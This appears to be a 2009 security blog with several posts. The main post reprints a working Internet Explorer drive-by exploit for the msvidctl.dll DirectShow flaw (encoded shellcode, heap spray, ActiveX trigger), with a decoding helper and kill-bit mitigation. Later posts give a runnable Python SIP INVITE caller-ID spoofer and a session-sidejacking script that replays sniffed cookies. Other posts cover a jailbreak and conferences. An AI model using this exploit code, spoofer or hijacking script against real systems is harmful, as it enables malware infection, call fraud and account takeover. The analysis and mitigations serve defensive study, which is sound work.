Tuesday, July 7, 2009

DirectShow 0day in the wild

A DirectShow 0day is being exploited in the wild at a high rate; the current outbreak began last week. The vulnerable component is the Microsoft Video ActiveX control (msvidctl.dll) that ships with Windows XP and Windows Server 2003: a web page only has to instantiate the control and point it at a crafted media file to trigger the bug, so the victim does not have to open anything in Windows Media Player.

This is a client side (IE) exploit, so simply visiting a malicious page with Internet Explorer is enough to get infected.

The attack looks as follows (I found this code on a http://**.****.cn page; the site name is masked):

// NOP sled: appllaa is '0', so nndx evaluates to '%u9090%u9090'
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
// Shellcode: four NOPs, a jmp/call GetPC stub (eb 03 59 eb 05 e8 f8 ff ff ff),
// then a printable (alphanumeric-encoded) payload
var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
"%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" +
"%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" +
"%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" +
"%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" +
"%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" +
"%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" +
"%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" +
"%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" +
"%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" +
"%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" +
"%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" +
"%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" +
"%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" +
"%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" +
"%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" +
"%u6363%u5251%u634c%u5553%u4550");
// Heap spray: build a block of NOPs that is 0x30000 characters long
// (0x60000 bytes, since JS strings are UTF-16) and append the shellcode to it
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace) omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
// 300 copies (about 112 MiB) so the sled sits at predictable heap addresses
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
// Trigger: instantiate the vulnerable control by CLSID with a media file as
// its data source. DivID is a <div id="DivID"> elsewhere on the page
// (IE exposes element ids as global variables).
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
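To see what the sprayed string actually carries, here is an added analysis helper (my own code, not from the page or the exploit author). It decodes a %uXXXX string the way IE lays it out in memory (one UTF-16LE code unit per escape, low byte first), measures the NOP sled, locates the jmp/call GetPC stub, checks that the bytes after it are printable (the signature of an alphanumeric encoder), and computes the spray footprint. It embeds only the sled prefix and the first units of the shellcode string above as a constructed excerpt; the full string is on the page.

```python
import re
import struct

# Constructed excerpt: nndx from the page and the opening units of its shellcode.
NNDX = "%u9090%u9090"
SHELLCODE_PREFIX = ("%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949"
                    "%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b")

# jmp +3 ; pop ecx ; jmp +5 ; call -8  (leaves the payload address in ecx)
GETPC_STUB = bytes.fromhex("eb0359eb05e8f8ffffff")


def decode_unicode_escapes(js_string):
    """Bytes that unescape('%uXXXX...') occupies in an IE process.

    Each %uXXXX is one UTF-16 code unit; JS strings are stored UTF-16LE,
    so %u03eb becomes the bytes eb 03.
    """
    units = re.findall(r"%u([0-9a-fA-F]{4})", js_string)
    return b"".join(struct.pack("<H", int(u, 16)) for u in units)


def nop_sled_length(buf):
    """Number of leading 0x90 bytes."""
    n = 0
    while n < len(buf) and buf[n] == 0x90:
        n += 1
    return n


def find_getpc_stub(buf):
    """Offset of the GetPC stub in buf, or -1 if it is not there."""
    return buf.find(GETPC_STUB)


def is_printable_payload(buf):
    """True when every byte is printable ASCII, i.e. an alphanumeric-style encoding."""
    return len(buf) > 0 and all(0x20 <= b < 0x7F for b in buf)


def spray_footprint(blocks=300, block_chars=0x30000):
    """Bytes committed by the spray: 300 blocks of 0x30000 UTF-16 characters."""
    return blocks * block_chars * 2


def analyse(js_string):
    buf = decode_unicode_escapes(js_string)
    stub = find_getpc_stub(buf)
    body = buf[stub + len(GETPC_STUB):] if stub >= 0 else b""
    return {
        "bytes": buf,
        "nop_sled": nop_sled_length(buf),
        "getpc_offset": stub,
        "printable_body": is_printable_payload(body),
    }


if __name__ == "__main__":
    info = analyse(NNDX + SHELLCODE_PREFIX)
    print(info["bytes"].hex())
    print("NOP sled:", info["nop_sled"], "bytes; GetPC stub at:", info["getpc_offset"],
          "; printable body:", info["printable_body"])
    print("spray footprint: %.1f MiB" % (spray_footprint() / 2 ** 20))
```

The payload bytes following the stub all fall in the printable range ('7', a run of 'I', then 'QZjEXP0B0Ak...'), which is the layout of a self-decoding alphanumeric encoder: the `I` (0x49, `dec ecx`) run adjusts the pointer the stub left in ecx before the decoder proper starts. The same decoder works on any %u-encoded spray string, not just this one.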

Microsoft's advisory (published today) offers workarounds for the issue, including setting the kill bit for the ActiveX control.

There is no patch yet; the known mitigation is to set the "kill bit" in the registry for the ActiveX component, which stops Internet Explorer from instantiating it:

1. Create the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}

2. Under it, create a DWORD value named "Compatibility Flags" and set it to 400 hexadecimal (0x400 is the kill-bit flag).

Importing the following .reg file does both steps:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400



Saturday, June 27, 2009

Let it sn0w

The iPod/iPhone 3G jailbreak is out. The iphone-dev team just released the 24kpwn LLB patch to allow for a persistent jailbreak. The team had been hanging on to this patch because there was the possibility the exploit could be used on future iPhone versions. Unfortunately, a group started selling the code, so the team was forced to release it for free. There is a tutorial available for updating a factory reset iPod/iPhone (backup link).

That means the same sort of technique can be used with the current redsn0w tool to jailbreak and unlock the iPhone 3GS.

Let it ultrasn0w....

Wednesday, June 17, 2009

Infosec 2009

Open world, Open standards, Open source...
Infosec2009

Going to be very interesting ;)

Tuesday, May 26, 2009

[Sum]mation ILHack

Good morning All! First, I would like to thank Yaniv Miron for organizing such a great conference and inviting me to speak about VoIP Tactics && Exploitation at ILHack 2009.

Next, this one goes to all of my students/friends/colleagues: thanks for the BIG support. You are all in my local subnet ;)

Special 10x to SIPM4ST3R Yossef Cohen for the lab organization, coding, and talking about the SIP protocol as a part of the lecture.

The presentation, video of the lecture and source code (SIPy and sip00fer) will be available in the ILHack download section during this weekend.



Hope to see you all, soon.

Jacky Altal

Wednesday, May 20, 2009

Saturday, May 9, 2009

sip00fer

After a looong week, I've finished my case study on a PBX (Asterisk). A new 1.6.1.0 Asterisk version was installed on CentOS, a great distro, and with the help of the SIP M4ST3R Yossef{at}maxxvoice{dot}com I managed to install AND configure my new PBX up && running in a few hours. [./configure; make; make install] simple as that.

Then, I started testing my Asterisk box, as I saw a sample code in the Metasploit framework that can create a fake call to any extension. The code didn't work against a new 1.6.0.5, as Yossef found that the CSeq var was missing, so I decided to implement it myself; I used RFC 3261 to deeply understand the protocol and to expand my research into this fascinating area.

I wrote POC code in Python and then converted it to C++; the POC builds a fake packet and sends it to the SIP client.

The code will be posted soon -> ilHack 2009 <- along with a new SIPcliFuzzer.

Usage: sip00fer [host] [port] [fake_extension] [Fake_Caller]
Example: sip00fer 13.37.7.1 31317 101 jackjack
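As an added illustration (my own code, not the sip00fer source, which is not on this page), here is a Python builder for a spoofed INVITE in the same usage shape. It always emits the CSeq header the Metasploit sample lacked, and it checks for the six header fields RFC 3261 section 8.1.1 requires in every request (To, From, CSeq, Call-ID, Max-Forwards, Via), so a malformed message is caught before it goes out. The local address 192.0.2.10 and the argument names are assumptions; send_invite really transmits UDP, so point it only at a PBX you own.

```python
import argparse
import secrets
import socket

# Mandatory header fields for every SIP request (RFC 3261, section 8.1.1).
REQUIRED_HEADERS = ("To", "From", "CSeq", "Call-ID", "Max-Forwards", "Via")


def build_invite(host, port, fake_extension, fake_caller,
                 local_ip="192.0.2.10", local_port=5060, cseq=1):
    """Spoofed INVITE for fake_extension on host:port, claiming to be fake_caller."""
    branch = "z9hG4bK" + secrets.token_hex(8)   # RFC 3261 branch magic cookie
    tag = secrets.token_hex(4)
    call_id = secrets.token_hex(8) + "@" + local_ip
    lines = [
        "INVITE sip:%s@%s:%d SIP/2.0" % (fake_extension, host, port),
        "Via: SIP/2.0/UDP %s:%d;branch=%s;rport" % (local_ip, local_port, branch),
        "Max-Forwards: 70",
        'From: "%s" <sip:%s@%s>;tag=%s' % (fake_caller, fake_caller, local_ip, tag),
        "To: <sip:%s@%s>" % (fake_extension, host),
        "Call-ID: " + call_id,
        "CSeq: %d INVITE" % cseq,            # the field the Metasploit sample omitted
        "Contact: <sip:%s@%s:%d>" % (fake_caller, local_ip, local_port),
        "Content-Length: 0",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_headers(message):
    """Return (request line, {lower-case field name: value}) for a SIP message."""
    head = message.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def missing_required_headers(message):
    """Names of RFC 3261 mandatory fields absent from message."""
    _, headers = parse_headers(message)
    return [h for h in REQUIRED_HEADERS if h.lower() not in headers]


def strip_header(message, name):
    """Drop one header field (used to reproduce the CSeq-less sample)."""
    prefix = name.lower() + ":"
    return "\r\n".join(l for l in message.split("\r\n")
                       if not l.lower().startswith(prefix))


def send_invite(message, host, port):
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(message.encode("utf-8"), (host, port))


if __name__ == "__main__":
    ap = argparse.ArgumentParser(usage="%(prog)s [host] [port] [fake_extension] [fake_caller]")
    ap.add_argument("host")
    ap.add_argument("port", type=int)
    ap.add_argument("fake_extension")
    ap.add_argument("fake_caller")
    args = ap.parse_args()
    invite = build_invite(args.host, args.port, args.fake_extension, args.fake_caller)
    missing = missing_required_headers(invite)
    if missing:
        raise SystemExit("refusing to send, missing headers: %s" % ", ".join(missing))
    send_invite(invite, args.host, args.port)
    print(invite)
```

Run as `python sip00fer_example.py 13.37.7.1 31317 101 jackjack` to mirror the usage line above. The From display name is what the called phone shows as caller ID; nothing in a plain UDP INVITE authenticates it, which is exactly why the spoof works against a PBX that does not require authentication for incoming INVITEs.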

Monday, April 27, 2009

Sidejacking

Hamster is a tool for HTTP session hijacking by passive sniffing. It eavesdrops on a network, captures the session cookies sent in clear-text HTTP requests, then imports them into your browser so you can take over the victim's session without ever learning the password.

Download Link
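An added example of the core of a sidejacker, written by me and not taken from Hamster: over a constructed, sniffed HTTP exchange it pulls the cookies out of a captured request, builds the request that replays them, and lists which cookies the server set without the Secure attribute, the property that would have kept them off the clear-text wire in the first place (HttpOnly does not help here; it only hides cookies from script). Host names, paths and cookie values are made up.

```python
# Constructed sample of what a passive sniffer sees on an open wireless network.
SNIFFED_REQUEST = (
    "GET /inbox HTTP/1.1\r\n"
    "Host: webmail.example\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: PHPSESSID=9a3f1c7e2b4d; lang=en\r\n"
    "\r\n"
)
SNIFFED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: PHPSESSID=9a3f1c7e2b4d; Path=/; HttpOnly\r\n"
    "Set-Cookie: lang=en; Path=/\r\n"
    "Set-Cookie: csrf=7f2a; Path=/; Secure\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_headers(raw):
    """(start line, [(lower-case name, value), ...]) for one HTTP message head."""
    head = raw.split("\r\n\r\n", 1)[0]
    start, *lines = head.split("\r\n")
    fields = []
    for line in lines:
        name, _, value = line.partition(":")
        fields.append((name.strip().lower(), value.strip()))
    return start, fields


def extract_cookies(request):
    """Cookie name -> value from a captured request's Cookie header(s)."""
    _, fields = parse_headers(request)
    cookies = {}
    for name, value in fields:
        if name == "cookie":
            for pair in value.split(";"):
                k, _, v = pair.strip().partition("=")
                if k:
                    cookies[k] = v
    return cookies


def hijack_request(host, path, cookies):
    """A request of our own that presents the victim's cookies."""
    cookie_header = "; ".join("%s=%s" % kv for kv in cookies.items())
    return ("GET %s HTTP/1.1\r\nHost: %s\r\nCookie: %s\r\n\r\n"
            % (path, host, cookie_header))


def cookies_without_secure(response):
    """Names of cookies the server set without the Secure attribute."""
    _, fields = parse_headers(response)
    exposed = []
    for name, value in fields:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].partition("=")[0]
        attributes = {p.lower() for p in parts[1:]}
        if "secure" not in attributes:
            exposed.append(cookie_name)
    return exposed


if __name__ == "__main__":
    stolen = extract_cookies(SNIFFED_REQUEST)
    print(hijack_request("webmail.example", "/inbox", stolen))
    print("set without Secure:", cookies_without_secure(SNIFFED_RESPONSE))
```

The fix on the server side is the one the last function checks for: session cookies marked Secure are never sent over plain HTTP, so there is nothing for a sniffer to capture, provided the site is actually served over HTTPS.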